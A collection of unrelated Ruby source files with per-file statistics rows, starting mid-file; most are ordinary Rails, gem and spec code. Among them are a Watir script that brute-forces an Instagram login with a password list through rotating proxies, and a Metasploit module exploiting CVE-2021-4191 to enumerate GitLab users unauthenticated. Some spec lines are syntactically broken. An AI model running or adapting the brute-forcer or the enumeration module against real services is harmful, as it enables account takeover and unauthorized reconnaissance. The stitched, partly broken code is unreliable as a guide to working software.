# Must be a valid Cloud Storage URL, beginning with `gs://`.
class DynamicTemplateLaunchParams
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# ParameterType specifies what kind of input we need for this parameter.
module ParameterType
# Default input type.
DEFAULT = 0
# The parameter specifies generic text input.
TEXT = 1
# The parameter specifies a Cloud Storage Bucket to read from.
GCS_READ_BUCKET = 2
# The parameter specifies a Cloud Storage Bucket to write to.
GCS_WRITE_BUCKET = 3
# The parameter specifies a Cloud Storage file path to read from.
GCS_READ_FILE = 4
# The parameter specifies a Cloud Storage file path to write to.
GCS_WRITE_FILE = 5
# The parameter specifies a Cloud Storage folder path to read from.
GCS_READ_FOLDER = 6
# The parameter specifies a Cloud Storage folder to write to.
GCS_WRITE_FOLDER = 7
# The parameter specifies a Pub/Sub Topic.
PUBSUB_TOPIC = 8
# The parameter specifies a Pub/Sub Subscription.
PUBSUB_SUBSCRIPTION = 9
end
end
end
end
end
| 45.757225 | 116 | 0.596577 |
61d57207d4d1c3f44865b4ad7645353d38f1cb0b | 269 | class UsersController < ApplicationController
respond_to :json
def show
@user = User.find(params[:id])
end
def currentuser
@user = current_user
render 'users/show'
end
private
def user_params
params.require(:user).permit(:id)
end
end | 14.944444 | 45 | 0.687732 |
7acda88db5998f11d0658e2fd8541425e9b0ca46 | 2,290 | # -*- encoding: utf-8 -*-
# stub: http_parser.rb 0.6.0 ruby lib
# stub: ext/ruby_http_parser/extconf.rb
Gem::Specification.new do |s|
s.name = "http_parser.rb".freeze
s.version = "0.6.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Marc-Andre Cournoyer".freeze, "Aman Gupta".freeze]
s.date = "2013-12-11"
s.description = "Ruby bindings to http://github.com/ry/http-parser and http://github.com/a2800276/http-parser.java".freeze
s.email = ["[email protected]".freeze, "[email protected]".freeze]
s.extensions = ["ext/ruby_http_parser/extconf.rb".freeze]
s.files = ["ext/ruby_http_parser/extconf.rb".freeze]
s.homepage = "http://github.com/tmm1/http_parser.rb".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "3.0.1".freeze
s.summary = "Simple callback-based HTTP request/response parser".freeze
s.installed_by_version = "3.0.1" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<rake-compiler>.freeze, [">= 0.7.9"])
s.add_development_dependency(%q<rspec>.freeze, [">= 2.0.1"])
s.add_development_dependency(%q<json>.freeze, [">= 1.4.6"])
s.add_development_dependency(%q<benchmark_suite>.freeze, [">= 0"])
s.add_development_dependency(%q<ffi>.freeze, [">= 0"])
s.add_development_dependency(%q<yajl-ruby>.freeze, [">= 0.8.1"])
else
s.add_dependency(%q<rake-compiler>.freeze, [">= 0.7.9"])
s.add_dependency(%q<rspec>.freeze, [">= 2.0.1"])
s.add_dependency(%q<json>.freeze, [">= 1.4.6"])
s.add_dependency(%q<benchmark_suite>.freeze, [">= 0"])
s.add_dependency(%q<ffi>.freeze, [">= 0"])
s.add_dependency(%q<yajl-ruby>.freeze, [">= 0.8.1"])
end
else
s.add_dependency(%q<rake-compiler>.freeze, [">= 0.7.9"])
s.add_dependency(%q<rspec>.freeze, [">= 2.0.1"])
s.add_dependency(%q<json>.freeze, [">= 1.4.6"])
s.add_dependency(%q<benchmark_suite>.freeze, [">= 0"])
s.add_dependency(%q<ffi>.freeze, [">= 0"])
s.add_dependency(%q<yajl-ruby>.freeze, [">= 0.8.1"])
end
end
| 44.901961 | 124 | 0.657205 |
e943bb53fa5b7eeb02a62b5270c05d907e2735b3 | 48 | module Octicons
VERSION = "15.0.1".freeze
end
| 12 | 27 | 0.708333 |
03cc27c31c7b85dcbedacc313028d6ff00cfa411 | 791 | require 'watir'
require_relative 'creds'
require_relative 'prox'
username = $username
counter=0
loop do
$password.each { |val|
# Open Browser, Navigate to Login page
browser = Watir::Browser.new :chrome, :switches => ['--proxy-server=socks5://'+"#{$proxy[counter]}"]
browser.goto "instagram.com/accounts/login/"
puts "#{$proxy[counter]}"
# Navigate to Username and Password fields, inject info
puts "Logging in..."
browser.text_field(:name => "username").set "#{username}"
browser.text_field(:name => "password").set "#{val}"
browser.button(:class => '_0mzm- sqdOP L3NKy').click
sleep(5)
counter= counter+1
if browser.button(:class => '_0mzm- sqdOP L3NKy').exists?
browser.close
else
print "\a"
puts "We're in #hackerman"
end
}
end
| 25.516129 | 102 | 0.663717 |
e9ad04d01f4e77df4832e3a392d69d0bcd373588 | 166 | module Web::Controllers::Books
class Index
include Web::Action
expose :books
def call(params)
@books = BookRepository.new.all
end
end
end
| 13.833333 | 37 | 0.656627 |
38a49e8f60b3f9dc2d0cd8a287ea48972db04bd0 | 1,642 | require 'spec_helper'
require_relative '../../../app/models/visualization/name_checker'
include CartoDB
describe Visualization::NameChecker do
before :all do
bypass_named_maps
@user = create(:valid_user)
@user2 = create(:valid_user)
@vis1 = build(:derived_visualization, name: 'Visualization 1', user_id: @user.id).store
@vis2 = build(:derived_visualization, name: 'Visualization 2', user_id: @user.id).store
@vis3 = build(:derived_visualization, name: 'Visualization 4', user_id: @user2.id).store
@shared_entity = Carto::SharedEntity.create(
recipient_id: @user.id,
recipient_type: Carto::SharedEntity::RECIPIENT_TYPE_USER,
entity_id: @vis3.id,
entity_type: Carto::SharedEntity::ENTITY_TYPE_VISUALIZATION
)
end
after :all do
@shared_entity.destroy
@vis3.destroy
@vis2.destroy
@vis1.destroy
@user.destroy
end
describe '#available?' do
it 'returns true if passed visualization name is available for the user' do
checker = Visualization::NameChecker.new(@user)
checker.available?('Visualization 3').should == true
end
it 'returns false if passed visualization name is in use by the user' do
checker = Visualization::NameChecker.new(@user)
checker.available?('Visualization 1').should == false
checker.available?('Visualization 2').should == false
end
it 'returns true if name is available but used in shared visualizations' do
checker = Visualization::NameChecker.new(@user)
checker.available?('Visualization 4').should == true
end
end # available?
end # Visualization::NameChecker
| 32.84 | 92 | 0.705238 |
e98703a1f874a415d49028239401a66968e1ff44 | 1,818 | module QuestionsHelper
def questions_index_links(questions)
links = []
# links for form mode
if params[:controller] == 'forms'
# add the 'add questions to form' link if there are some questions
unless @questions.empty?
links << batch_op_link(:name => t("form.add_selected"), :path => add_questions_form_path(@form))
end
# add the create new questions link
links << create_link(Question, :js => true) if can?(:create, Question)
# otherwise, we're in regular questions mode
else
# add the create new question
links << create_link(Question) if can?(:create, Question)
add_import_standard_link_if_appropriate(links)
end
# return the link set
links
end
def questions_index_fields
fields = %w(std_icon code name type form_count answer_count published)
# dont add the actions column if we're not in the forms controller, since that means we're probably in form#choose_questions
fields << 'actions' unless params[:controller] == 'forms'
fields
end
def format_questions_field(q, field)
case field
when "std_icon" then std_icon(q)
when "type" then t(q.qtype_name, :scope => :question_type)
when "published" then tbool(q.published?)
when "answer_count" then number_with_delimiter(q.answer_count)
when "actions" then table_action_links(q)
when "name"
params[:controller] == 'forms' ? q.name : link_to(q.name, q)
else q.send(field)
end
end
# Builds option tags for the given option sets. Adds multilevel data attrib.
def option_set_select_option_tags(sets, selected_id)
sets.map do |s|
content_tag(:option, s.name, value: s.id, selected: s.id == selected_id ? 'selected' : nil, :'data-multilevel' => s.multi_level?)
end.join.html_safe
end
end
| 32.464286 | 135 | 0.687569 |
21537d8173252d58cd9b1b322006f737cc07ce5e | 2,857 | require 'rails_helper'
RSpec.describe Voucher, type: :model do
fixtures :all
describe "relationships" do
it "should have an associated MASA" do
v1 = vouchers(:voucher1)
expect(v1.manufacturer).to be_present
end
it "should have an associated MASA" do
v1 = vouchers(:voucher1)
expect(v1.voucher_request).to be_present
end
end
describe "receiving" do
it "should raise an exception when reading a voucher without public key" do
voucher_binary=IO::read(File.join("spec","files","voucher_jada123456789_bad.vch"))
expect {
v1 = CoseVoucher.from_voucher(nil, :cose, voucher_binary)
}.to raise_error(Chariwt::Voucher::MissingPublicKey)
end
it "should create voucher object and place the signed data in it" do
voucher_base64 = IO::read(File.join("spec","files","voucher_JADA_f2-00-01.pkcs"))
voucher_binary = Base64.decode64(voucher_base64)
v1 = CmsVoucher.from_voucher(nil, :pkcs7, voucher_binary, nil)
expect(v1.device).to eq(devices(:jadaf20001))
expect(v1).to_not be_proximity
end
it "should find a constrained voucher in the specification" do
cv2 = vouchers(:cv2)
expect(cv2.device).to eq(devices(:jadaf20002))
end
it "should load a constrained voucher representation, and create a database object for it" do
voucher_binary = IO::read(File.join("spec","files","voucher_00-D0-E5-F2-00-02.vch"))
masa_pubkey = IO::read(File.join("spec","files", ""))
v1 = CoseVoucher.from_voucher(nil, :cose, voucher_binary, nil)
expect(v1.device).to eq(devices(:f20))
end
it "should get a voucher format error on empty voucher object" do
voucher_base64 = IO::read(File.join("spec","files","voucher_EMPTY.pkcs"))
voucher_binary = Base64.decode64(voucher_base64)
expect {
v1 = Voucher.from_voucher(nil, :pkcs7, voucher_binary, nil)
}.to raise_exception(Voucher::VoucherFormatError)
end
it "should process a multipart voucher response into two parts" do
voucher_mime = Mail.read(File.join("spec","files","voucher_00-D0-E5-F2-00-03.mvch"))
expect(voucher_mime).to_not be_nil
expect(voucher_mime.parts[0]).to_not be_nil
expect(voucher_mime.parts[0].content_type).to eq("application/voucher-cose+cbor")
expect(voucher_mime.parts[1]).to_not be_nil
expect(voucher_mime.parts[1].content_type).to eq("application/pkcs7-mime; smime-type=certs-only")
end
it "should process a multipart voucher response into a validated voucher" do
input_voucher = IO::binread(File.join("spec","files","voucher_00-D0-E5-F2-00-03.mvch"))
v1 = Voucher.from_multipart(nil, :cbor, input_voucher)
expect(v1).to_not be_nil
expect(v1.type).to eq("CoseVoucher")
expect(v1).to be_valid
end
end
end
| 34.421687 | 103 | 0.690935 |
ed598c3e735a69207ca6143fec4b93abc01a7595 | 2,552 | require 'spec_helper_acceptance'
# Enable Cron Daemon - Section 5.1.1
describe service('crond') do
it { is_expected.to be_running }
end
# Ensure permissions on /etc/crontab are configured - Section 5.1.2
describe file('/etc/crontab') do
it { is_expected.to be_file }
it { is_expected.to be_owned_by 'root' }
it { is_expected.to be_grouped_into 'root' }
it { is_expected.to be_mode 644
end
# Ensure permissions on /etc/cron.hourly are configured - Section 5.1.3
describe file('/etc/cron.hourly') do
it { is_expected.to be_directory }
it { is_expected.to be_owned_by 'root' }
it { is_expected.to be_grouped_into 'root' }
it { is_expected.to be_mode 700 }
end
# Ensure permissions on /etc/cron.daily are configured - Section 5.1.4
describe file('/etc/cron.daily') do
it { is_expected.to be_directory }
it { is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 700
end
end
# Ensure permissions on /etc/cron.weekly are configured - Section 5.1.5
describe file('/etc/cron.weekly') do
it do
is_expected.to be_directory
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 700
end
end
# Ensure permissions on /etc/cron.monthly are configured - Section 5.1.6
describe file('/etc/cron.monthly') do
it do
is_expected.to be_directory
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 700
end
end
# Ensure permissions on /etc/cron.d are configured - Section 5.1.7
describe file('/etc/cron.monthly') do
it do
is_expected.to be_directory
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 700
end
end
# Ensure at/cron is restricted to authorized users - Section 5.1.8
describe file('/etc/at.deny') do
it do
is_expected.not_to be_file
end
end
describe file('/etc/cron.deny') do
it do
is_expected.not_to be_file
end
end
describe file('/etc/cron.allow') do
it do
is_expected.to be_file
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 600
end
end
describe file('/etc/at.allow') do
it do
is_expected.to be_file
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 600
end
end
| 27.44086 | 74 | 0.679859 |
33d6073a892c47bbaf3bb2099518d1e528e70998 | 265 | name "openopps"
description "Open Opportunities configuration & customizations on Midas for AWS"
run_list "midas"
override_attributes(
midas: {
config_repo: "https://github.com/18F/midas-open-opportunities.git",
config_name: "open-opportunities",
}
)
| 22.083333 | 80 | 0.74717 |
e908d23ee8eb230f50a9969ebb1d351f0ffbb5d6 | 380 | require "domainotron/version"
module Domainotron
def self.get_domain(url, remove_www: true)
normalized = url.sub(/:\d+{2,6}/, '').sub(/\/\Z/, '')
unless url.match /^(http:\/\/|https:\/\/|\/\/)/
normalized = '//' + normalized
end
domain = URI.parse(normalized).host
if remove_www
domain = domain.gsub('www.', '')
end
domain
end
end
| 19 | 57 | 0.576316 |
6298a74d9920d5fd0e9d962b405e0bfc3486ee89 | 564 | require 'rails_helper'
RSpec.describe DashboardController, type: :controller do
it 'inherits from ProtectedController' do
expect(subject).to be_a_kind_of(ProtectedController)
end
let(:user_client) { FactoryGirl.create(:user_client) }
before(:example) { sign_in user_client }
describe "GET index" do
it "returns http success" do
get :index
expect(response).to have_http_status(:success)
end
it "returns html content type" do
get :index
expect(response.content_type).to eq(Mime::HTML.to_s)
end
end
end
| 20.888889 | 58 | 0.707447 |
3871d939feb62c16ebfaef7d32c06aef82524a2a | 1,517 | require 'spec_helper'
describe Gitlab::Ci::Config do
let(:config) do
described_class.new(yml)
end
context 'when config is valid' do
let(:yml) do
<<-EOS
image: ruby:2.2
rspec:
script:
- gem install rspec
- rspec
EOS
end
describe '#to_hash' do
it 'returns hash created from string' do
hash = {
image: 'ruby:2.2',
rspec: {
script: ['gem install rspec',
'rspec']
}
}
expect(config.to_hash).to eq hash
end
describe '#valid?' do
it 'is valid' do
expect(config).to be_valid
end
it 'has no errors' do
expect(config.errors).to be_empty
end
end
end
context 'when config is invalid' do
context 'when yml is incorrect' do
let(:yml) { '// invalid' }
describe '.new' do
it 'raises error' do
expect { config }.to raise_error(
Gitlab::Ci::Config::Loader::FormatError,
/Invalid configuration format/
)
end
end
end
context 'when config logic is incorrect' do
let(:yml) { 'before_script: "ls"' }
describe '#valid?' do
it 'is not valid' do
expect(config).not_to be_valid
end
it 'has errors' do
expect(config.errors).not_to be_empty
end
end
end
end
end
end
| 20.5 | 54 | 0.497034 |
28e34706975e698eb65260feacc171ad7e8ba9e1 | 3,069 | class DatabaseBackup
BACKUP_DIR = 'db/backups'
module Frequency
DAILY = :daily
HOURLY = :hourly
end
attr_accessor :max_num_of_backups
def initialize(database_backup_adapter, max_num_of_backups: 10)
@database_backup_adapter = database_backup_adapter
@max_num_of_backups = max_num_of_backups
@rotate_frequency = nil
end
def create
FileUtils.mkdir_p backup_path
@latest_backup_file = create_backup
remove_symlink_to_old_backup
create_symlink_to_new_backup
delete_oldest_backup
compress_old_backups
@latest_backup_file
end
def create_rotated(frequency)
@rotate_frequency = frequency
create
cleanup
end
def restore(path)
@database_backup_adapter.restore path
end
def restore_most_recent
@database_backup_adapter.restore symlink_file
end
def symlink_file
File.join backup_path, 'latest.dump'
end
def backups
Dir.glob(File.join(backup_path, '*'))
end
def cleanup
# hourly - keep for 24 hours
sh "find #{storage_path}/backup.hourly/ -mmin +1440 -exec rm -rv {} \\;"
# daily - keep for 14 days
sh "find #{storage_path}/backup.daily/ -mtime +14 -exec rm -rv {} \\;"
# weekly - keep for 60 days
sh "find #{storage_path}/backup.weekly/ -mtime +60 -exec rm -rv {} \\;"
# monthly - keep for 300 days
sh "find #{storage_path}/backup.monthly/ -mtime +300 -exec rm -rv {} \\;"
end
private
# Procedural Methods
def create_backup
backup_filename = "#{Time.now.strftime('%Y%m%d%H%M%S')}.dump"
latest_backup_file = File.join backup_path, backup_filename
@database_backup_adapter.create_backup latest_backup_file
latest_backup_file
end
def remove_symlink_to_old_backup
File.delete(symlink_file) if File.exist?(symlink_file)
end
def create_symlink_to_new_backup
sh "ln -sf #{@latest_backup_file} #{symlink_file}"
end
def delete_oldest_backup
File.delete(old_backups.first) if old_backups.count >= max_num_of_backups
end
def compress_old_backups
old_backups.each do |backup_filename|
next if backup_filename =~ /.dump.gz/
sh "gzip #{backup_filename}"
end
end
# Helper Methods
def root_dir
Rails.root
end
def backup_path
if @rotate_frequency
rotated_backup_path(@rotate_frequency)
else
storage_path
end
end
def storage_path
File.join(root_dir, BACKUP_DIR)
end
def rotated_backup_path(frequency = Frequency::DAILY)
storage = File.join(root_dir, BACKUP_DIR)
now = Time.now
if now.day == 1
storage = File.join(storage, 'backup.monthly')
elsif now.wday == 0
storage = File.join(storage, 'backup.weekly')
elsif frequency == Frequency::DAILY || now.hour == 0
storage = File.join(storage, 'backup.daily')
elsif frequency == Frequency::HOURLY
storage = File.join(storage, 'backup.hourly')
end
storage
end
def old_backups
backups.sort.reject { |r|
r == @latest_backup_file || r == symlink_file
}
end
def sh(cmd)
`#{cmd}`
end
end
| 23.427481 | 77 | 0.69306 |
6a12c6f988b900384fc14c5f5be702486f0b5dab | 340 | #
# Cookbook:: accesos
# Recipe:: panidiroftp
#
# Copyright:: 2018, The Authors, All Rights Reserved.
#
node.default['openssh']['server']['permit_root_login'] = "no"
node.default['openssh']['server']['password_authentication'] = "yes"
node.default['openssh']['server']['allow_groups'] = "linux_admin panidiroftp"
#
include_recipe 'openssh'
| 28.333333 | 77 | 0.717647 |
39f381423ebe4e7901097e16909431d2f3bfb26c | 534 | cask 'boxer' do
version '1.4.0'
sha256 'a75f9149612f90fa78f1016a6edef34ed600334f7170d624b083a310ae4c904e'
# github.com/alunbestor/Boxer was verified as official when first introduced to the cask
url "https://github.com/alunbestor/Boxer/releases/download/v#{version}/boxer-#{version}.zip"
appcast 'http://boxerapp.com/appcast',
checkpoint: 'a8d19705429ced354ead57abc45060f504368fd7def6038fb2f54e77a8a22c21'
name 'Boxer'
homepage 'http://boxerapp.com/'
depends_on macos: '>= :leopard'
app 'Boxer.app'
end
| 33.375 | 94 | 0.7603 |
33b2eb28ee2684ae8f52a9e27c450b0b4b8c4e4f | 640 | Rails.application.routes.draw do
devise_for :users
resources :facilities
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
post '/file_uploads', to: 'file_uploads#upload'
resources :file_uploads, only: [:index, :new]
get '/file_uploads/:id', to: 'file_uploads#show', as: 'show_processed_file'
get 'reports', action: 'index', controller: 'reports'
get 'reports/lengths/:processed_file_id', action: 'lengths_for_measurement', controller: 'reports'
get 'home', action: 'index', controller: 'home'
get 'about', action: 'show', controller: 'home'
root 'home#index'
end
| 35.555556 | 101 | 0.725 |
38d5044c58755debe348400cbd16b7180a89845f | 356 | class CreateInvitations < ActiveRecord::Migration[6.0]
def change
create_table :invitations do |t|
t.integer :user_id
t.integer :event_id
t.boolean :attending, default: false
t.timestamps
end
add_foreign_key :invitations, :events, column: :event_id
add_foreign_key :invitations, :users, column: :user_id
end
end
| 27.384615 | 60 | 0.702247 |
26c34b3f125c27b55f931c74af91fc30435577f9 | 1,094 | module Importer
# Import a csv file with one work per row. The first row of the csv should be a
# header row. The model for each row can either be specified in a column called
# 'type' or globally by passing the model attribute
class CSVImporter
def initialize(metadata_file, files_directory, model = nil)
@model = model
@files_directory = files_directory
@metadata_file = metadata_file
end
def import_all
count = 0
parser.each do |attributes|
create_fedora_objects(attributes)
count += 1
end
count
end
private
def parser
CSVParser.new(@metadata_file)
end
# Build a factory to create the objects in fedora.
def create_fedora_objects(attributes)
model = attributes.delete(:type) || @model.to_s
if model.empty?
$stderr.puts 'ERROR: No model was specified'
# rubocop:disable Rails/Exit
exit(1)
# rubocop:enable Rails/Exit
end
Factory.for(model).new(attributes, @files_directory).run
end
end
end
| 27.35 | 81 | 0.642596 |
1a31e3e37bd2030378e3c5f45b22f09ed22f701f | 521 | require "sentry/rails/tracing/abstract_subscriber"
module Sentry
module Rails
module Tracing
class ActionViewSubscriber < AbstractSubscriber
EVENT_NAME = "render_template.action_view".freeze
def self.subscribe!
subscribe_to_event(EVENT_NAME) do |event_name, duration, payload|
record_on_current_span(op: event_name, start_timestamp: payload[:start_timestamp], description: payload[:identifier], duration: duration)
end
end
end
end
end
end
| 28.944444 | 149 | 0.708253 |
5d6ea812be98fb1b97a0a593a5d02c76fd7034fc | 5,689 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GitLab GraphQL API User Enumeration',
'Description' => %q{
This module queries the GitLab GraphQL API without authentication
to acquire the list of GitLab users (CVE-2021-4191). The module works
on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.
},
'License' => MSF_LICENSE,
'Author' => [
'jbaines-r7', # Independent discovery and Metasploit module
'mungsul' # Independent discovery
],
'References' => [
[ 'CVE', '2021-4191' ],
[ 'URL', 'https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/#unauthenticated-user-enumeration-on-graphql-api'],
[ 'URL', 'https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/']
],
'DisclosureDate' => '2022-02-25',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
##
# Send the GraphQL query to the /api/graphql endpoint. Despite being able to
# extract significantly more information, this request will only request
# usernames. The function will do some verification to ensure the received
# payload is the expected JSON.
#
# @param after [String] The parameter is used for paging because GitLab will only
# return 100 results at a time. If no paging is needed this should be empty.
# @return [Hash] A Ruby Hash representation of the returned JSON data.
##
def do_request(after)
graphql_query = '{"query": "query { users'
unless after.empty?
graphql_query += "(after:\\\"#{after}\\\")"
end
graphql_query.concat(' { pageInfo { hasNextPage, hasPreviousPage, endCursor, startCursor }, nodes { username } } }" }')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/graphql'),
'ctype' => 'application/json',
'data' => graphql_query
})
fail_with(Failure::UnexpectedReply, "The target didn't respond with 200 OK") unless res&.code == 200
fail_with(Failure::UnexpectedReply, "The target didn't respond with an HTTP body") unless res.body
user_json = res.get_json_document
fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if user_json.nil?
nodes = user_json.dig('data', 'users', 'nodes')
fail_with(Failure::UnexpectedReply, 'Could not find nodes in the JSON body') if nodes.nil?
user_json
end
##
# Parses the JSON data returned by the server. Adds the usernames to
# the users array and adds them, indirectly, to create_credential_login.
# This function also determines if we need to request more data from
# the server.
#
# @param user_json [Hash] The JSON data provided by the server
# @param users [Array] An array to store new usernames in
# @return [String] An empty string or the "endCursor" to use with do_request
##
def parse_json(user_json, users)
nodes = user_json.dig('data', 'users', 'nodes')
return '' if nodes.nil?
nodes.each do |node|
username = node['username']
store_username(username, node)
users.push(username)
end
query_paging_info = ''
more_data = user_json.dig('data', 'users', 'pageInfo', 'hasNextPage')
if !more_data.nil? && more_data == true
query_paging_info = user_json['data']['users']['pageInfo']['endCursor']
end
query_paging_info
end
def store_userlist(users, service)
loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'GitLab Users', service)
print_good("Userlist stored at #{loot}")
end
def store_username(username, json)
connection_details = {
module_fullname: fullname,
workspace_id: myworkspace_id,
username: username,
proof: json,
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_details)
create_credential_and_login(connection_details)
end
##
# Send an initial GraphQL request to the server and keep sending
# requests until the server has no more data to give us.
##
def run_host(_ip)
user_json = do_request('')
service = report_service(
host: rhost,
port: rport,
name: (ssl ? 'https' : 'http'),
proto: 'tcp'
)
# parse the initial page
users = []
query_paging_info = parse_json(user_json, users)
# handle any follow on pages
request_count = 0
until query_paging_info.empty?
# periodically tell the user that we are still working. Start at 1 since one request already happened
request_count += 1
print_status("GraphQL API pagination request: #{request_count}") if request_count % 5 == 0
user_json = do_request(query_paging_info)
query_paging_info = parse_json(user_json, users)
end
if users.empty?
print_error('No GitLab users were enumerated.')
else
print_good("Enumerated #{users.length} GitLab users")
users_string = users.join("\n") + "\n"
store_userlist(users_string, service)
end
end
end
| 34.065868 | 165 | 0.652311 |
0864e7ef2af737f1d63b9ef3fd32aecfc7e4d50d | 4,525 | require 'active_support/core_ext/hash/keys'
require 'action_dispatch/middleware/session/abstract_store'
require 'rack/session/cookie'
module ActionDispatch
module Session
# This cookie-based session store is the Rails default. It is
# dramatically faster than the alternatives.
#
# Sessions typically contain at most a user_id and flash message; both fit
# within the 4K cookie size limit. A CookieOverflow exception is raised if
# you attempt to store more than 4K of data.
#
# The cookie jar used for storage is automatically configured to be the
# best possible option given your application's configuration.
#
# If you only have secret_token set, your cookies will be signed, but
# not encrypted. This means a user cannot alter their +user_id+ without
# knowing your app's secret key, but can easily read their +user_id+. This
# was the default for Rails 3 apps.
#
# If you have secret_key_base set, your cookies will be encrypted. This
# goes a step further than signed cookies in that encrypted cookies cannot
# be altered or read by users. This is the default starting in Rails 4.
#
# If you have both secret_token and secret_key base set, your cookies will
# be encrypted, and signed cookies generated by Rails 3 will be
# transparently read and encrypted to provide a smooth upgrade path.
#
# Configure your session store in config/initializers/session_store.rb:
#
# Rails.application.config.session_store :cookie_store, key: '_your_app_session'
#
# Configure your secret key in config/secrets.yml:
#
# development:
# secret_key_base: 'secret key'
#
# To generate a secret key for an existing application, run `rake secret`.
#
# If you are upgrading an existing Rails 3 app, you should leave your
# existing secret_token in place and simply add the new secret_key_base.
# Note that you should wait to set secret_key_base until you have 100% of
# your userbase on Rails 4 and are reasonably sure you will not need to
# rollback to Rails 3. This is because cookies signed based on the new
# secret_key_base in Rails 4 are not backwards compatible with Rails 3.
# You are free to leave your existing secret_token in place, not set the
# new secret_key_base, and ignore the deprecation warnings until you are
# reasonably sure that your upgrade is otherwise complete. Additionally,
# you should take care to make sure you are not relying on the ability to
# decode signed cookies generated by your app in external applications or
# Javascript before upgrading.
#
# Note that changing the secret key will invalidate all existing sessions!
# Session store that keeps the entire session payload in the cookie itself
# (no server-side storage). The cookie is signed/encrypted through the
# request's cookie jar, so clients cannot tamper with its contents.
class CookieStore < Rack::Session::Abstract::ID
  include Compatibility
  include StaleSessionCheck
  include SessionObject

  def initialize(app, options={})
    # cookie_only: the session id must come from the cookie, never from
    # query parameters.
    super(app, options.merge!(:cookie_only => true))
  end

  # Drops the current session. Returns a freshly generated session id
  # (or nil when options[:drop] is set) and resets the memoized unpacked
  # cookie data for this request.
  def destroy_session(env, session_id, options)
    new_sid = generate_sid unless options[:drop]
    # Reset hash and Assign the new session id
    env["action_dispatch.request.unsigned_session_cookie"] = new_sid ? { "session_id" => new_sid } : {}
    new_sid
  end

  # Returns [session_id, session_hash] for the current request, ensuring a
  # session id is present in the hash.
  def load_session(env)
    stale_session_check! do
      data = unpacked_cookie_data(env)
      data = persistent_session_id!(data)
      [data["session_id"], data]
    end
  end

  private

  def extract_session_id(env)
    stale_session_check! do
      unpacked_cookie_data(env)["session_id"]
    end
  end

  # Reads and memoizes the verified session hash from the cookie jar.
  # Falls back to an empty hash when no (valid) cookie is present.
  def unpacked_cookie_data(env)
    env["action_dispatch.request.unsigned_session_cookie"] ||= begin
      stale_session_check! do
        if data = get_cookie(env)
          data.stringify_keys!
        end
        data || {}
      end
    end
  end

  # Ensures the session hash carries a "session_id", generating one when
  # missing.
  def persistent_session_id!(data, sid=nil)
    data ||= {}
    data["session_id"] ||= sid || generate_sid
    data
  end

  # The session data itself becomes the cookie value; stamp the id into it.
  def set_session(env, sid, session_data, options)
    session_data["session_id"] = sid
    session_data
  end

  def set_cookie(env, session_id, cookie)
    cookie_jar(env)[@key] = cookie
  end

  def get_cookie(env)
    cookie_jar(env)[@key]
  end

  # Signed-or-encrypted jar: verifies (and decrypts, when configured) the
  # session cookie on read, and signs/encrypts on write.
  def cookie_jar(env)
    request = ActionDispatch::Request.new(env)
    request.cookie_jar.signed_or_encrypted
  end
end
end
end
| 36.491935 | 107 | 0.676906 |
03d1225767c1dc13c47535d1cd79e0db1a4eeba4 | 504 | # frozen_string_literal: true
require_relative '../options_helper'
# Covers the --fact-override / --to-fact-override CLI option parsing.
describe OctocatalogDiff::CatalogDiff::Cli::Options do
  describe '#opt_fact_override' do
    # Shared examples cover the generic array-option behavior.
    include_examples 'global array option', 'fact-override', :fact_override_in

    it 'should accept multiple facts of the same type' do
      # Repeating the flag should accumulate values, not overwrite them.
      args = ['--to-fact-override', 'foo=bar', '--to-fact-override', 'baz=buzz']
      result = run_optparse(args)
      expect(result[:to_fact_override_in]).to eq(['foo=bar', 'baz=buzz'])
    end
  end
end
| 31.5 | 80 | 0.704365 |
38c4a834c57c0cf23e2e189d759de7e631d78536 | 1,039 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20170810023811) do

  # Application accounts; `password_digest` backs has_secure_password and
  # `role` drives authorization checks.
  create_table "users", force: :cascade, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8" do |t|
    t.string   "email"
    t.string   "password_digest"
    t.string   "role"
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

end
| 43.291667 | 93 | 0.766121 |
